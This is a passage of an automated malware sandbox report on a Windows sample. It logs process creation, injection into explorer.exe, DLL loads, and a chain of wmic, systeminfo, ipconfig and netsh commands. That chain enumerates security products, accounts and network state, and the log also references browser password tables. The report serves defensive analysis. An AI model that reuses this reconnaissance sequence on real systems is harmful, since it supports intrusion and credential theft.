                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1952&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2024&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2096&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2188&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2204&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2240&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2392&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2400&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2440&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2484&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2492&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2528&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2588&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2596&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2628&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2768&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2868&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2932&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3260&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3512&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3696&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3756&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3984&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2456&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4132&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4800&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4800&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4572&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5152&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5932&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6708&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6792&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6836&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6960&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3584&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5640&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5608&quot;::GetOwner
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: A7E9.tmp.10.dr, AF9D.tmp.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 9VgIkx4su0.exeReversingLabs: Detection: 34%
                  Source: unknownProcess created: C:\Users\user\Desktop\9VgIkx4su0.exe "C:\Users\user\Desktop\9VgIkx4su0.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeProcess created: C:\Windows\System32\cmd.exe cmd
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
